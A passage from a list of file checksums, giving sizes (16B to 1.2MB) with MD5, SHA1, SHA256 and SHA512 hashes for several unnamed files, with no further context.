  SHA256: cd26c0fc8cc54d1651bb870279d98a3f6478d9277bb4f9172e18a8ab96ca1381
  SHA512: de990814010f15dcc1c424de82640e4d3043c97576e3c38bc096a6c20b6cb84ed472eabff16b8ccbfc0e244469c567cce1241974a9f6d48450078232b78a73f0
- Filesize: 16B
  MD5: 17d432845dc7cb55ac69d75cf72f7f5d
  SHA1: 7f3b6e6ab91b3a13c0611fe6e95befab691d5cc3
  SHA256: a7cd0523e7aca4fd8db39d49ce1fe6198b92956509bd360dae646798c2a251a4
  SHA512: 25054cd4ec03675f28d0aa1aa09b691beacb9f9a1cf538179777d74a713e97457c39d56c787becc378fcdc31c62cbdf56546f8cee41f5f99f11b8798663104e0
- Filesize: 226B
  MD5: dbb166b2cffc079b44924e92466171d7
  SHA1: cb823da5de668ee405b06017dd985771027e79d3
  SHA256: e6c5dcc5439aa68cfeee91ce1a470378c695e48b57c0cd4d6bc13d284f9802a7
  SHA512: d235662d33c9308e3c100ae7b602424ee1a773d53f2bf59f1821c31f2a8eef7f24b7417484dca76e1c5bd48372c332c27cfbfc132747b985222800103d93b220
- Filesize: 265B
  MD5: 709496a7457cd02ed24b9e66adf6bf27
  SHA1: 7b8bcd5cb4509e9977d78875020f254ac76d1686
  SHA256: 69143ed1105df5c01cd16a8628265930cc1c3a52977a100f28e02e56e9b8cfc8
  SHA512: 75137b9f3c83168618d18bd5677ad4d74ff82f89060ce477f3fd48f14bbf60f4487639945b7c91d6125045653a59a09945644b60cd3c2b26c8742859f36dcbf1
- Filesize: 260B
  MD5: 54d637bfafe6569b860104aabd8e6a75
  SHA1: 7714e949108aa00ab9bba3bf562cfebf8e8cd367
  SHA256: dedb43d8daa5b13115a0416246b29cfeea294ac38f1c3f5dbbebe28df94f04c3
  SHA512: 99166447bfcd35244c27c9d8aa320b6b1a4eeccb095d49f8a97d9fdd31f905d7896eec287f63166d5423bf84cd884d0fca9fe9db035d9106fc1e293d64a26c50
- Filesize: 1.2MB
  MD5: c82d64850d35cc6a536c11adbd261cf6
  SHA1: 9f4d070a1b4668d110b57c167c4527fa2752c1fe
  SHA256: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1
  SHA512: 777a06d73e70a881d5b3872236ba8b53aa4d42f94ad247c109980847ccd6d0c531d30afef10315d7b5fe70c7fe4496f932aaac41f6aec76e98474c44bb781002